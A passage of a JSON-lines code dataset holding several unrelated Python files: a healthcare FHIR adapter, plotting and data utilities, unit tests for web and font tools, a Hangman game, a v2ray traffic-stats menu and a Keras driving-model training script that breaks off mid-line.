ambulatory care\n \"\"\"\n\n @classmethod\n def to_fhir_object(cls, impression):\n jsondict = {}\n jsondict[\"identifier\"] = cls.build_fhir_identifier(impression)\n jsondict[\"status\"] = cls.build_fhir_status(impression)\n jsondict[\"code\"] = cls.build_fhir_code(impression)\n dt_or_period = cls.build_fhir_effective_datetime_or_period(impression)\n if isinstance(dt_or_period, dict):\n jsondict[\"effectivePeriod\"] = dt_or_period\n else:\n jsondict[\"effectiveDateTime\"] = dt_or_period\n jsondict[\"context\"] = cls.build_fhir_context(impression)\n jsondict[\"subject\"] = cls.build_fhir_subject(impression)\n jsondict[\"assessor\"] = cls.build_fhir_assessor(impression)\n jsondict[\"date\"] = cls.build_fhir_date(impression)\n jsondict[\"summary\"] = cls.build_fhir_summary(impression)\n return fhir_impression(jsondict=jsondict)\n\n @classmethod\n def get_fhir_object_id_from_gh_object(cls, impression):\n return impression.id\n\n @classmethod\n def get_fhir_resource_type(cls):\n return \"ClinicalImpression\"\n\n @classmethod\n def build_fhir_identifier(cls, impression):\n try:\n return [{\"value\": impression.code}]\n except:\n return None\n\n @classmethod\n def build_fhir_status(cls, impression):\n # GNU Health states - in_progress, done, signed, None\n if impression.state in [\"done\", \"signed\"] or (\n impression.evaluation_start and impression.evaluation_endtime\n ):\n status = \"completed\"\n elif impression.state == \"in_progress\" or impression.appointment:\n status = \"draft\"\n else:\n status = \"unknown\"\n return status\n\n @classmethod\n def build_fhir_code(cls, impression):\n # TODO More information\n return {\"text\": \"Patient evaluation\"}\n\n @classmethod\n def build_fhir_context(cls, impression):\n return cls.build_fhir_reference_from_adapter_and_object(Encounter, impression)\n\n @classmethod\n def build_fhir_subject(cls, impression):\n return cls.build_fhir_reference_from_adapter_and_object(\n Patient, impression.patient\n )\n\n @classmethod\n def build_fhir_effective_datetime_or_period(cls, impression):\n try:\n start = instance(impression.evaluation_start).to_iso8601_string()\n if impression.evaluation_endtime:\n end = instance(impression.evaluation_endtime).to_iso8601_string()\n return {\"start\": start, \"end\": end}\n else:\n return start\n except:\n return None\n\n @classmethod\n def build_fhir_assessor(cls, impression):\n return cls.build_fhir_reference_from_adapter_and_object(\n Practitioner, impression.healthprof\n )\n\n @classmethod\n def build_fhir_date(cls, impression):\n try:\n last = impression.write_date or impression.evaluation_start\n return instance(last).to_iso8601_string()\n except:\n return None\n\n @classmethod\n def build_fhir_summary(cls, impression):\n # Shove Objective in here - evaluation_summary\n # Shove HPI in here - present_illness + chief_complaint\n # Shove Plan in here - directions\n return \"CC: {}\\n\\nHPI: {}\\n\\nObjective: {}\\n\\nPlan: {}\".format(\n *safe_attrgetter(\n impression,\n \"chief_complaint\",\n \"present_illness\",\n \"evaluation_summary\",\n \"directions\",\n default=\"\",\n )\n )\n\n # investigation - put all the s/s, pe findings there\n # clinical_findings = {\"code\": {\"text\": \"Clinical findings\"}}\n\n # Other misc garbage\n # extras = [{'text': x} for x in safe_attrgetter(note, 'notes', 'notes_complaint', 'info_diagnosis', default='') if x.strip()]\n # if extras: jsondict['note'] = extras\n","repo_name":"teffalump/gnu_health_fhir","sub_path":"gnu_health_fhir/adapters/clinical_impression_adapter.py","file_name":"clinical_impression_adapter.py","file_ext":"py","file_size_in_byte":4556,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"31471961063","text":"#Code written by Jason Whitmore\n#WWU CSCI 491/2/3\n\n#This script creates a \"real time\" plot of predictions based on csv files that have columns\n#[timestep, human mean, human stddev, bot mean, bot stddev]\n\n#v 3.2.1\nfrom matplotlib import pyplot\n\n#v 1.14.5\nimport numpy as np\n\n#v 0.25.3\nimport pandas as pd\n\nSECONDS_OF_DATA = 60\n\nREALTIME_PREDICTIONS_CSV_PATH = \"realtime/realtime_\" + str(SECONDS_OF_DATA) + \".csv\"\n\nFRAME_SCALAR = 1.0 / 24.0\n\nHUMAN_COLOR = \"green\"\n\nBOT_COLOR = \"red\"\n\nALPHA = 0.5\n\n\n\nPLOT_TITLE = \"Real time detector predictions (trained on \" + str(SECONDS_OF_DATA) + \" seconds of gameplay)\"\n\n\nX_AXIS_LABEL = \"Time from start of match (s)\"\n\nX_AXIS_MIN = 0\n\nX_AXIS_MAX = SECONDS_OF_DATA\n\nX_AXIS_STEPSIZE = 5\n\n\nY_AXIS_LABEL = \"Detector prediction\"\n\nY_AXIS_MIN = 0\n\nY_AXIS_MAX = 1\n\nY_AXIS_STEPSIZE = 0.1\n\n\n#Load into a numpy array\n\ndata = pd.read_csv(REALTIME_PREDICTIONS_CSV_PATH).values\n\n#Scale the frame number column to be in terms of seconds passed\n\nfor i in range(len(data)):\n data[i][0] *= FRAME_SCALAR\n\n#Isolate the rows and insert into own np arrays\n\nseconds = []\n\nh_mean = []\nh_std = []\n\nb_mean = []\nb_std = []\n\nfor i in range(len(data)):\n seconds.append(data[i][0])\n\n h_mean.append(data[i][1])\n h_std.append(data[i][2])\n\n b_mean.append(data[i][3])\n b_std.append(data[i][4])\n\nseconds = np.array(seconds)\n\nh_mean = np.array(h_mean)\nh_std = np.array(h_std)\n\nb_mean = np.array(b_mean)\nb_std = np.array(b_std)\n\n\npyplot.plot(seconds, h_mean, HUMAN_COLOR)\npyplot.fill_between(seconds, h_mean + h_std, h_mean - h_std, color=HUMAN_COLOR, alpha=ALPHA)\n\npyplot.plot(seconds, b_mean, BOT_COLOR)\npyplot.fill_between(seconds, b_mean + b_std, b_mean - b_std, color=BOT_COLOR, alpha=ALPHA)\n\npyplot.title(PLOT_TITLE)\n\npyplot.xlabel(X_AXIS_LABEL)\npyplot.xlim(X_AXIS_MIN, X_AXIS_MAX)\npyplot.xticks(np.arange(X_AXIS_MIN, X_AXIS_MAX + 1, X_AXIS_STEPSIZE))\n\npyplot.ylabel(Y_AXIS_LABEL)\npyplot.ylim(0,1)\npyplot.yticks(np.arange(Y_AXIS_MIN, Y_AXIS_MAX + 0.1, Y_AXIS_STEPSIZE))\n\npyplot.legend([\"Human predictions\", \"Bot predictions\"])\n\npyplot.show()\n","repo_name":"tsikerdekis/starcraft-bot-detection","sub_path":"evaluations/realtime_plotter.py","file_name":"realtime_plotter.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41522809810","text":"import numpy as np\r\ndef outliers_whiskers(feature_name=None, df=None, l_whis=1.5, u_whis=1.5):\r\n # apply after cluster but w/o exclude bad range\r\n Throw_Feature = df[feature_name]\r\n quartile_1, median, quartile_3 = 25 , 50, 75\r\n Q1, median, Q3 = np.percentile(np.asarray(Throw_Feature), [quartile_1, median, quartile_3])\r\n IQR = Q3 - Q1\r\n loval = Q1 - 1.5 * IQR\r\n hival = Q3 + 1.5 * IQR\r\n wisklo = np.compress(Throw_Feature >= loval, Throw_Feature)\r\n wiskhi = np.compress(Throw_Feature <= hival, Throw_Feature)\r\n lower_bound = np.min(wisklo)\r\n upper_bound = np.max(wiskhi)\r\n return (lower_bound, upper_bound)\r\n","repo_name":"caseyhcjen/tool","sub_path":"data_proc_tool.py","file_name":"data_proc_tool.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7684861429","text":"#!/usr/bin/python3\n\"\"\"Write a script that adds all arguments to a Python list,\nand then save them to a file\nYou must use your function save_to_json_file from 5-save_to_json_file.py\nYou must use your function load_from_json_file from 6-load_from_json_file.py\nThe list must be saved as a JSON representation in a file named add_item.json\nYou don’t need to manage arguments passed to the script (see example below)\"\"\"\n\n\nimport sys\nsave_to_json_file = __import__('5-save_to_json_file').save_to_json_file\nload_from_json_file = __import__('6-load_from_json_file').load_from_json_file\n\ntry:\n my_list = load_from_json_file(\"add_item.json\")\nexcept:\n my_list = []\nfor i in range(1, len(sys.argv)):\n my_list.append(sys.argv[i])\nsave_to_json_file(my_list, \"add_item.json\")\n","repo_name":"Nomad-Rob/holbertonschool-higher_level_programming","sub_path":"python-input_output/7-add_item.py","file_name":"7-add_item.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29062536303","text":"import unittest\nimport mock\nimport webapp2\nimport webtest\n\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext import testbed\n\nimport main\n# [END imports]\n\n\nclass AppTest(unittest.TestCase):\n\n def setUp(self):\n app = webapp2.WSGIApplication([('/api/draw.*',\n main.ImageRequestHandler)])\n self.testapp = webtest.TestApp(app)\n self.testbed = testbed.Testbed()\n self.testbed.activate()\n # Next, declare which service stubs you want to use.\n self.testbed.init_datastore_v3_stub()\n self.testbed.init_memcache_stub()\n self.testbed.init_urlfetch_stub()\n # Clear ndb's in-context cache between tests.\n # This prevents data from leaking between tests.\n # Alternatively, you could disable caching by\n # using ndb.get_context().set_cache_policy(False)\n ndb.get_context().clear_cache()\n\n def tearDown(self):\n self.testbed.deactivate()\n\n def test_get_path_id(self):\n self.assertEqual('abc', main.get_path_id('123/456/abc'))\n\n def test_get_odds_ratio(self):\n risk = '1:100'\n self.assertEqual('1:100', main.get_odds_ratio(risk))\n risk = '0.1'\n self.assertEqual('1:10', main.get_odds_ratio(risk))\n risk = '123'\n with self.assertRaises(ValueError):\n main.get_odds_ratio(risk)\n risk = '100:50'\n with self.assertRaises(ValueError):\n main.get_odds_ratio(risk)\n\n def test_get_standout_fraction(self):\n frac = '0.5'\n self.assertEqual(0.5, main.get_standout_fraction(frac))\n # Test default\n frac = 'abc'\n self.assertEqual(0.0, main.get_standout_fraction(frac))\n\n def test_get_color(self):\n # Test hex\n color_param = 'ff00dd'\n default = 'black'\n self.assertEqual('#ff00dd', main.get_color(color_param, default))\n # Test default\n color_param = None\n self.assertEqual('black', main.get_color(color_param, default))\n # Test string color\n color_param = 'red'\n self.assertEqual('red', main.get_color(color_param, default))\n\n def test_get_shape(self):\n # Test arg\n shape_req = 'circle'\n self.assertEqual('circle', main.get_shape(shape_req))\n # test default\n shape_req = None\n self.assertEqual('square', main.get_shape(shape_req))\n\n def test_get_position(self):\n # Test arg\n pos_req = '1'\n self.assertTrue(main.get_position(pos_req))\n pos_req = '0'\n self.assertFalse(main.get_position(pos_req))\n # test default\n pos_req = 'abc'\n self.assertFalse(main.get_position(pos_req))\n\n def test_get_filetype(self):\n # Test arg\n req = 'png'\n self.assertEqual('png', main.get_filetype(req))\n # test default\n req = 'abc'\n self.assertEqual('svg', main.get_filetype(req))\n\n # Test the handler\n @mock.patch('main.get_filetype')\n @mock.patch('main.get_position')\n @mock.patch('main.get_shape')\n @mock.patch('main.get_odds_ratio')\n @mock.patch('draw.create_img')\n @mock.patch('main.get_color')\n @mock.patch('main.get_standout_fraction')\n def test_ImageRequestHandler(self, get_frac, get_color, create_img, get_o,\n get_shape, get_pos, get_ft):\n get_ft.return_value = 'svg'\n get_frac.return_value = 0.75\n get_color.return_value = 'orange'\n get_o.return_value = '1:50'\n get_pos.return_value = True\n get_shape.return_value = 'square'\n # Test all params except filetype\n params = {\n 'odds': '1:100',\n 'shape': 'circle',\n 'color1': 'blue',\n 'color2': 'green',\n 'index': '0.5',\n 'right': '1',\n 'w': '500',\n 'num_wide': '500'\n }\n response = self.testapp.get('/api/draw/', params)\n # Check color2 called ok\n get_color.selfAssertTrue([mock.call('blue', 'black'),\n mock.call('green', 'red')],\n get_color.call_args_list)\n # Check get_frac called ok\n get_frac.assert_called_with('0.5')\n # Check get_odds_ratio called ok\n get_o.assert_called_with('1:100')\n # Check create_img called ok\n create_img.assert_called_with('1:50', shape='square',\n color1='orange', color2='orange',\n standout_frac=0.75, right=True,\n width=500, num_wide=500)\n self.assertEqual(response.status_int, 200)\n self.assertEqual(response.content_type, 'image/svg+xml')\n\n # Test with no width arg\n get_ft.return_value = 'svg'\n params = {\n 'odds': '1:100',\n 'shape': 'circle',\n 'color1': 'blue',\n 'color2': 'green',\n 'index': '0.5',\n 'right': '1',\n 'num_wide': 500,\n 'type': 'png'\n }\n response = self.testapp.get('/api/draw/', params)\n create_img.assert_called_with('1:50', shape='square',\n color1='orange', color2='orange',\n standout_frac=0.75, right=True,\n num_wide=500)\n self.assertEqual(response.status_int, 200)\n self.assertEqual(response.content_type, 'image/svg+xml')\n\n # Test bad odds provided\n get_o.side_effect = ValueError()\n params = {}\n response = self.testapp.get('/api/draw/', params, status=400)\n self.assertEqual(response.status_int, 400)\n\n\n# [START main]\nif __name__ == '__main__':\n unittest.main()\n# [END main]\n","repo_name":"michaeljboyle/picturisk","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":5793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28995703086","text":"import asyncio\nimport os\nimport pytest\nfrom fontTools.ufoLib import UFOReader\nfrom fontgoggles.compile.ufoCompiler import fetchCharacterMappingAndAnchors\nfrom fontgoggles.compile.compilerPool import compileUFOToPath\nfrom testSupport import getFontPath\n\n\ndef test_ufoCharacterMapping():\n ufoPath = getFontPath(\"MutatorSansBoldWideMutated.ufo\")\n reader = UFOReader(ufoPath)\n cmap, revCmap, anchors = fetchCharacterMappingAndAnchors(reader.getGlyphSet(), ufoPath)\n assert cmap[0x0041] == \"A\"\n assert revCmap[\"A\"] == [0x0041]\n # MutatorSansBoldWideMutated.ufo/glyphs/A_.glif contains a commented-out <unicode>\n # tag, that must not be parsed, as well as a commented-out <anchor>.\n assert 0x1234 not in cmap\n assert anchors == {\n \"A\": [(\"top\", 645, 815)],\n \"E\": [(\"top\", 582.5, 815)],\n \"macroncmb\": [(\"_top\", 0, 815)],\n \"asteriskabovecmb\": [(\"_top\", 153, 808)],\n \"asteriskbelowcmb\": [(\"_top\", 153, 808)],\n }\n\n\ndef test_ufoCharacterMapping_glyphNames():\n ufoPath = getFontPath(\"MutatorSansBoldWideMutated.ufo\")\n reader = UFOReader(ufoPath)\n cmap, revCmap, anchors = fetchCharacterMappingAndAnchors(reader.getGlyphSet(), ufoPath, [\"A\"])\n assert cmap[0x0041] == \"A\"\n assert revCmap[\"A\"] == [0x0041]\n assert anchors == {\"A\": [(\"top\", 645, 815)]}\n\n\n@pytest.mark.asyncio\nasync def test_compileUFOToPath(tmpdir):\n ufoPath = getFontPath(\"MutatorSansBoldWideMutated.ufo\")\n ttPath = tmpdir / \"test.ttf\"\n output = []\n error = await compileUFOToPath(ufoPath, ttPath, output.append)\n output = \"\".join(output)\n assert ttPath.exists()\n assert os.stat(ttPath).st_size > 0\n assert not error\n assert output == \"\"\n\n\n@pytest.mark.asyncio\nasync def test_compileUFOToPathMultiple(tmpdir):\n ufoPaths = [\n getFontPath(\"MutatorSansBoldCondensed.ufo\"),\n getFontPath(\"MutatorSansBoldWide.ufo\"),\n getFontPath(\"MutatorSansIntermediateCondensed.ufo\"),\n getFontPath(\"MutatorSansIntermediateWide.ufo\"),\n getFontPath(\"MutatorSansLightCondensed.ufo\"),\n getFontPath(\"MutatorSansLightCondensed_support.S.middle.ufo\"),\n getFontPath(\"MutatorSansLightCondensed_support.S.wide.ufo\"),\n getFontPath(\"MutatorSansLightCondensed_support.crossbar.ufo\"),\n getFontPath(\"MutatorSansLightWide.ufo\"),\n ]\n ttPaths = [tmpdir / (u.name + \".ttf\") for u in ufoPaths]\n output = []\n coros = (compileUFOToPath(u, t, output.append) for u, t in zip(ufoPaths, ttPaths))\n results = await asyncio.gather(*coros)\n assert results == [None] * len(results)\n assert [(os.stat(p).st_size > 0) for p in ttPaths] == [True] * len(results)\n","repo_name":"justvanrossum/fontgoggles","sub_path":"Tests/test_ufoCompiler.py","file_name":"test_ufoCompiler.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":362,"dataset":"github-code","pt":"81"} +{"seq_id":"4259606422","text":"from django.db.models import Exists, OuterRef, Q\nfrom django.db.models.deletion import CASCADE, get_candidate_relations_to_delete\n\nfrom datahub.core.model_helpers import get_related_fields\n\n\ndef get_unreferenced_objects_query(\n model,\n excluded_relations=(),\n relation_exclusion_filter_mapping=None,\n):\n \"\"\"\n Generates a query set of unreferenced objects for a model.\n\n :param model: the model to generate a query set of unreferenced objects\n :param excluded_relations: related fields on model that should be ignored\n :param relation_exclusion_filter_mapping:\n Optional mapping of relations (fields on model) to Q objects.\n For each relation where a Q object is provided, the Q object is used to exclude\n objects for that relation prior to checking if any references to the model exist (for\n that relation).\n\n Example:\n This example will not consider interactions dated before 2015-01-01 when getting\n unreferenced companies.\n\n get_unreferenced_objects_query(\n Company,\n relation_exclusion_filter_mapping={\n Company._meta.get_field('interactions'): Q(date__lt=date(2015, 1, 1),\n }\n )\n\n :returns: queryset for unreferenced objects\n\n \"\"\"\n if relation_exclusion_filter_mapping is None:\n relation_exclusion_filter_mapping = {}\n\n fields = set(get_related_fields(model)) - set(excluded_relations)\n\n if relation_exclusion_filter_mapping.keys() - fields:\n raise ValueError('Invalid fields detected in relation_exclusion_filter_mapping.')\n\n q = Q()\n\n for field in fields:\n related_field = field.field\n exclusion_filters = relation_exclusion_filter_mapping.get(field, Q())\n subquery = related_field.model.objects.filter(\n **{related_field.attname: OuterRef('pk')},\n ).exclude(\n exclusion_filters,\n ).only('pk')\n q &= Q(~Exists(subquery))\n\n return model.objects.filter(q)\n\n\ndef get_relations_to_delete(model):\n \"\"\"\n Returns all the fields of `model` that point to models which would get deleted\n (on cascade) as a result this model getting deleted.\n\n :param model: model class\n :returns: list of fields of `model` that point to models deleted in cascade\n \"\"\"\n candidates = get_candidate_relations_to_delete(model._meta)\n return [\n field for field in candidates\n if field.field.remote_field.on_delete == CASCADE\n ]\n","repo_name":"uktrade/data-hub-api","sub_path":"datahub/cleanup/query_utils.py","file_name":"query_utils.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"81"} +{"seq_id":"43435483207","text":"from transformers import pipeline\nimport streamlit as st\nfrom PIL import Image\n\ncaptioner = pipeline(model=\"ydshieh/vit-gpt2-coco-en\")\n\n\nst.title('Image To Text')\n\nwith st.form('app'):\n upload_file = st.file_uploader(\"이미지 파일을 올려주세요.\")\n submit = st.form_submit_button('분석!')\n if submit:\n image = Image.open(upload_file)\n result = captioner(image)[0]['generated_text']\n st.image(image)\n st.subheader('분석 결과')\n st.text(result)\n\n\n","repo_name":"Dcom-KHU/image-to-text-demo-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"5181641578","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport os\n\nfrom loader import Loader\nfrom utils import ColorStr, calcul_iptables_traffic\n\nloader = Loader()\n\nprofile = loader.profile\n\ngroup_list = profile.group_list\n\nwhile True:\n print(\"Iptables 端口流量统计\")\n print(\"\")\n print(\"1.查看流量统计\\n\")\n print(\"2.重置流量统计\\n\")\n print(\"tip: v2ray功能端口默认自动开启iptables的流量统计\\n\")\n\n choice = input(\"请输入数字选择功能:\")\n if choice == \"1\":\n print(\"\")\n for group in group_list:\n print(calcul_iptables_traffic(group.port))\n print(\"\")\n\n elif choice == \"2\":\n port = input(\"请输入要重置流量的端口:\")\n if port and port.isnumeric():\n os.system(\"bash /usr/local/v2rayU/global_setting/clean_traffic.sh {}\".format(str(port)))\n else:\n print(ColorStr.red(\"输入有误!\"))\n else:\n break","repo_name":"BenJamesbabala/v2rayU","sub_path":"global_setting/iptables_ctr.py","file_name":"iptables_ctr.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13921489150","text":"# Project Name: Hangman\n# Version: 1.0\n# Author: Brendan Langenhoff (brend-designs)\n# Description: A simple game of Hangman using console/terminal\n\n# TODO: Update to using a GUI instead of console\n\nimport random\nimport enum\nfrom words import word_list\n\n\n# Store game variables in a class/object, for easier passing between functions.\nclass Game:\n word = \"\"\n word_completion = \"\"\n guessed = False\n guessed_letters = []\n guessed_words = []\n tries = 6\n\n def __init__(self, word):\n self.word = word\n self.word_completion = \"_\" * len(word)\n\n\n# Enum for types of guesses during the game\nclass GuessType(enum.Enum):\n LETTER = \"letter\"\n WORD = \"word\"\n\n\n# Get a random word from a static list defined in words.py\ndef get_word(): return random.choice(word_list).upper()\n\n\n# This function renders the game within the console\n# Parameters:\n# \"game\": Reference to our game object\n# \"starting\": True if game is starting, else false\ndef render(game, starting):\n if starting:\n print(\"Let's play Hangman!\")\n print(display_hangman(game.tries) + \"\\n\"\n + game.word_completion + \"\\n\")\n\n\n# This function adds a letter or word, to the guessed letters or words list.\n# Parameters:\n# \"game\": Reference to our game object\n# \"guess_type\": Type of guess (letter or word)\n# \"guess\": The letter or word that's been guessed\n# \"count-try\": Count this guess against their number of tries\ndef add_guess(game, guess_type, guess, count_try):\n if count_try:\n game.tries -= 1\n\n if guess_type == GuessType.LETTER:\n game.guessed_letters.append(guess)\n else:\n game.guessed_words.append(guess)\n\n\n# This function updates the completion of the word\n# Parameters:\n# \"game\": Reference to our game object\n# \"guess_type\": Type of guess (letter or word)\n# \"guess\": The letter or word that's been guessed\ndef update_word_completion(game, guess_type, guess):\n if guess_type == GuessType.WORD:\n game.word_completion = game.word\n else:\n word_as_list = list(game.word_completion)\n\n # Iterate through word to find the indexes of where this letter is within said word\n indices = [i for i, letter in enumerate(game.word) if letter == guess]\n\n for index in indices: # Loop through indexes of the guessed letter within the word\n word_as_list[index] = guess\n game.word_completion = \"\".join(word_as_list)\n\n if \"_\" not in game.word_completion: # Word has been guessed\n game.guessed = True\n\n\n# This function handles the game (Hangman) logic.\n# Parameter: \"word\": The random word that is trying to be guessed.\ndef play(word):\n game = Game(word)\n render(game, True)\n\n while not game.guessed and game.tries > 0:\n guess = input(\"Please guess a letter or word: \").upper()\n\n if len(guess) == 1 and guess.isalpha():\n guess_type = GuessType.LETTER\n\n if guess in game.guessed_letters:\n print(\"You already guessed the letter\", guess)\n elif guess not in word:\n print(guess, \"is not in the word.\")\n add_guess(game, guess_type, guess, True)\n else:\n print(\"Good job,\", guess, \"is in the word!\")\n add_guess(game, guess_type, guess, False)\n update_word_completion(game, guess_type, guess)\n elif len(guess) == len(word) and guess.isalpha():\n guess_type = GuessType.WORD\n\n if guess in game.guessed_words:\n print(\"You already guessed the word\", guess)\n elif guess != word:\n print(guess, \"is not the word.\")\n add_guess(game, guess_type, guess, True)\n else:\n game.guessed = True\n update_word_completion(game, guess_type, guess)\n else:\n print(\"Not a valid guess.\")\n render(game, False) # Re-render Hangman\n\n if game.guessed:\n print(\"Congrats, you guessed the word! You win!\")\n else:\n print(\"Sorry, you ran out of tries. The word was \" +\n word + \". Maybe next time!\")\n\n\n# This function just lays out Hangman at a particular stage/try.\n# Putting this towards the end as it's quite a long function.\ndef display_hangman(tries):\n stages = [ # Final state: head, torso, both arms, and both legs\n \"\"\"\n --------\n | |\n | O\n | \\\\|/\n | |\n | / \\\\\n -\n \"\"\",\n # Head, torso, both arms, and one leg\n \"\"\"\n --------\n | |\n | O\n | \\\\|/\n | |\n | / \n -\n \"\"\",\n # Head, torso, and both arms\n \"\"\"\n --------\n | |\n | O\n | \\\\|/\n | |\n | \n -\n \"\"\",\n # Head, torso, and one arm\n \"\"\"\n --------\n | |\n | O\n | \\\\|\n | |\n | \n -\n \"\"\",\n # Head and torso\n \"\"\"\n --------\n | |\n | O\n | |\n | |\n | \n -\n \"\"\",\n # Head\n \"\"\"\n --------\n | |\n | O\n | \n | \n | \n -\n \"\"\",\n # Initial empty state\n \"\"\"\n --------\n | |\n | \n | \n | \n | \n -\n \"\"\"\n ]\n return stages[tries]\n\n\ndef main():\n word = get_word()\n play(word)\n while input(\"Play Again? (Y/N)\").upper() == \"Y\":\n word = get_word()\n play(word)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"brenddesigns/hangman","sub_path":"Hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":6388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4261026742","text":"from urllib.parse import urljoin\n\nimport pytest\nfrom django.conf import settings\nfrom django.utils.timezone import now\nfrom freezegun import freeze_time\n\nfrom datahub.company.models import Company\nfrom datahub.company.test.factories import AdviserFactory, CompanyFactory\nfrom datahub.dnb_api.link_company import CompanyAlreadyDNBLinkedError, link_company_with_dnb\nfrom datahub.dnb_api.test.utils import model_to_dict_company\nfrom datahub.dnb_api.utils import DNBServiceInvalidRequestError\nfrom datahub.metadata.models import Country\n\npytestmark = pytest.mark.django_db\n\n\nDNB_V2_SEARCH_URL = urljoin(f'{settings.DNB_SERVICE_BASE_URL}/', 'v2/companies/search/')\n\n\n@freeze_time('2019-01-01 11:12:13')\ndef test_link_company_with_dnb_success(\n requests_mock,\n dnb_response_uk,\n base_company_dict,\n):\n \"\"\"\n Test the link_company_with_dnb utility.\n \"\"\"\n requests_mock.post(\n DNB_V2_SEARCH_URL,\n json=dnb_response_uk,\n )\n company = CompanyFactory()\n original_company = Company.objects.get(id=company.id)\n modifying_adviser = AdviserFactory()\n link_company_with_dnb(company.id, '123456789', modifying_adviser)\n company.refresh_from_db()\n uk_country = Country.objects.get(iso_alpha2_code='GB')\n assert model_to_dict_company(company) == {\n **base_company_dict,\n 'address_1': 'Unit 10, Ockham Drive',\n 'address_2': '',\n 'address_country': uk_country.id,\n 'address_county': '',\n 'address_postcode': 'UB6 0F2',\n 'address_area': None,\n 'address_town': 'GREENFORD',\n 'archived_documents_url_path': original_company.archived_documents_url_path,\n 'business_type': original_company.business_type_id,\n 'company_number': '01261539',\n 'created_by': original_company.created_by_id,\n 'duns_number': '123456789',\n 'employee_range': original_company.employee_range_id,\n 'export_experience_category': original_company.export_experience_category_id,\n 'global_ultimate_duns_number': '291332174',\n 'id': original_company.id,\n 'modified_by': modifying_adviser.id,\n 'name': 'FOO BICYCLE LIMITED',\n 'is_number_of_employees_estimated': True,\n 'number_of_employees': 260,\n 'pending_dnb_investigation': False,\n 'reference_code': '',\n 'registered_address_area': None,\n 'sector': original_company.sector_id,\n 'export_segment': original_company.export_segment,\n 'export_sub_segment': original_company.export_sub_segment,\n 'turnover': 50651895,\n 'turnover_range': original_company.turnover_range_id,\n 'uk_region': original_company.uk_region_id,\n 'dnb_modified_on': now(),\n 'strategy': '',\n 'is_out_of_business': original_company.is_out_of_business,\n }\n\n\ndef test_link_company_with_dnb_duns_already_set():\n \"\"\"\n Test link_company_with_dnb when it is called for a company which has already\n been linked with a DNB record.\n \"\"\"\n company = CompanyFactory(duns_number='123456788')\n modifying_adviser = AdviserFactory()\n with pytest.raises(CompanyAlreadyDNBLinkedError):\n link_company_with_dnb(company.id, '123456789', modifying_adviser)\n\n\ndef test_link_company_with_dnb_sync_task_failure(\n requests_mock,\n dnb_response_uk,\n):\n \"\"\"\n Test link_company_with_dnb when the sync_company_with_dnb task encounters\n a failure - expect the exception to bubble up.\n \"\"\"\n malformed_response = dnb_response_uk.copy()\n del malformed_response['results']\n requests_mock.post(\n DNB_V2_SEARCH_URL,\n json=malformed_response,\n )\n company = CompanyFactory()\n original_company = Company.objects.get(id=company.id)\n modifying_adviser = AdviserFactory()\n with pytest.raises(DNBServiceInvalidRequestError):\n link_company_with_dnb(company.id, '123456789', modifying_adviser)\n company.refresh_from_db()\n # Ensure that any changes to the record were rolled back due to the task failure\n assert company.duns_number is None\n assert company.modified_by == original_company.modified_by\n","repo_name":"uktrade/data-hub-api","sub_path":"datahub/dnb_api/test/test_link_company.py","file_name":"test_link_company.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"81"} +{"seq_id":"42770469645","text":"import csv\nfrom math import ceil\n\nimport cv2\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport sklearn\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Lambda, BatchNormalization, Dropout, Cropping2D\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.callbacks import EarlyStopping\n\nbatch_size = 32\nlines = []\n\n# load stored data\nwith open('./data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n lines.append(line)\n\n\n# helper function to read image from path\ndef read_image_from_disk(source_path):\n file_name = source_path.split('/')[-1]\n current_path = \"./data/IMG/\" + file_name\n image = cv2.imread(current_path)\n return image\n\n\n# splitting data into train_samples and validation_samples\ntrain_samples, validation_samples = train_test_split(lines, test_size=0.2)\n\n\n# create a generator for memory efficiency\ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n sklearn.utils.shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset + batch_size]\n\n images, measurements = [], []\n\n for sample in batch_samples:\n # create adjusted steering measurements for the center and side camera images\n\n # center image\n measurement = float(sample[3])\n center_image = read_image_from_disk(sample[0])\n images.append(center_image)\n\n measurements.append(measurement)\n\n images.append(cv2.flip(center_image, 1))\n measurements.append(measurement * -1.0)\n\n # side images\n left_image = read_image_from_disk(sample[1])\n right_image = read_image_from_disk(sample[2])\n\n correction = 0.2 # this is a parameter to tune\n steering_left = measurement + correction\n steering_right = measurement - correction\n\n measurements.extend([steering_left, steering_right])\n images.extend([left_image, right_image])\n\n # convert images and measurements to np.array\n X_train = np.array(images)\n y_train = np.array(measurements)\n\n yield sklearn.utils.shuffle(X_train, y_train)\n\n\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=batch_size)\nvalidation_generator = 